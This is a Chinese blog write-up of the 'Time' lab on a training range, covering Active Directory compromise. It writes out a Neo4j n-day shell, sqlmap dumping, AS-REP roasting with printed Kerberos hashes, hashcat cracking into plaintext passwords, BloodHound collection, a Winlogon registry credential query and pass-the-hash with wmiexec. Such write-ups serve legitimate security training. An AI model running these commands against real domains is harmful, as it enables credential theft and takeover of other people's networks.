Logo
Overview

渗透记录:春秋云镜Time

May 5, 2025
技术 CTF 题解

公网

neo4j nday

GitHub - zwjjustdoit/CVE-2021-34371.jar: CVE-2021-34371.jar
github.com
Favicon of the bookmark site
https://github.com

弹shell。第一个flag在home下

信息搜集

172.22.6.38 后台登录
172.22.6.36 (当前)
172.22.6.25  XIAORANG\WIN2019
172.22.6.12  DC-PROGAME.xiaorang.lab

172.22.6.38

后台登录,一个登录界面,直接sqlmap看看有没有注入。 

 proxychains4 -q sqlmap -r exp --dump

然后有一堆用户,应该是用来看能不能dump出票据的。

172.22.6.25 + 172.22.6.12

导出用户名后尝试拿tgt。 

proxychains4 -q GetNPUsers.py -dc-ip 172.22.6.12  xiaorang.lab/ -usersfile user.txt      
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:7248bf02104504427e297279327f343b$a7b2050b0ee2a6b55f00197b1c78f2de1033ffce1cb98236d12831a7d5b20c0a23f24ed7a3ea93583da81a6ed22c620b4859fc55d59c5b5bf1cbe820f1dce9e7e30da2ab7a91d89f77ee1f2cb9f38a11235b0d73a11d2bfb4d6f9d32a5509dcf70dc24e868906549770f0198c6586a3edf8fe07368b8da82dfad71ef4dcd7c810e8aa8ac82d7d7008b52d9177c4e6d363b35eaac88a732c8a8f3e01319b980f2affc2896a2a8bea1c8841350e2bd26389f87e228e5dbbfa8e07aa60a43f7656f3351c08446b355f05b1eb6fdf4d9c72da246b8cf78ee86e4abb1716d1d9f3d43dea24b49c883d2953f6c024c
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:b4b1737f5966da221617c1510816bb71$76f4a11b3bdf15f42a9b8f0801d8cc0dce8158a285a17b9047abb892f859580a1b5f78a566a480c55f9ebb7280a6f0e3b3663df707992699aef55075224e44f8cab5d5ea5836cc65e304ba698225e2dbc89a571afe15a07e892c5e6e3c2b3a1b36ef7694d15a8e81148900cec97435c1b68e49656b37fa49f4f0926d9333455a83bcdc1da8413317cd20dc2b386c05eb2c43727f47ae32afb083017106a67d5a1d4513aff0afeaa8efa156edd1e054261fa4a47a22e6d368caba99294de5496459253d99b6417f8a85ea86069f7bc4ff479d18e04038383ac86f8bcb450ab4bdda81726384fdf61c4bf70163

hashcat跑跑rockyou就有密码了。真实渗透哪有这么好的事情 

hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:b4b1737f5966da221617c1510816bb71$76f4a11b3bdf15f42a9b8f0801d8cc0dce8158a285a17b9047abb892f859580a1b5f78a566a480c55f9ebb7280a6f0e3b3663df707992699aef55075224e44f8cab5d5ea5836cc65e304ba698225e2dbc89a571afe15a07e892c5e6e3c2b3a1b36ef7694d15a8e81148900cec97435c1b68e49656b37fa49f4f0926d9333455a83bcdc1da8413317cd20dc2b386c05eb2c43727f47ae32afb083017106a67d5a1d4513aff0afeaa8efa156edd1e054261fa4a47a22e6d368caba99294de5496459253d99b6417f8a85ea86069f7bc4ff479d18e04038383ac86f8bcb450ab4bdda81726384fdf61c4bf70163' rockyou.txt
zhangxin@xiaorang.lab/strawberry
wenshao@xiaorang.lab/hellokitty

然后bloodhound收集信息 

proxychains4 -q bloodhound-python -u zhangxin -p strawberry -d xiaorang.lab -c all -ns 172.22.6.12 --zip --dns-tcp

看到这个yuxuan是有路径到域控的。

查看登录用户,yuxuan是一直登录的发现开了自动登录,于是注册表查password 

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

登录进去能拿到hash。

然后就是正常的pass the hash。 

 proxychains4 -q wmiexec.py  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
proxychains4 -q wmiexec.py  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9

按照他这个标的tag我猜应该在172.22.6.25这台上,可以用什么方式提权到administrator,然后才能拿到yuxuan的密码…?

🥲

1小时32分钟52秒

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。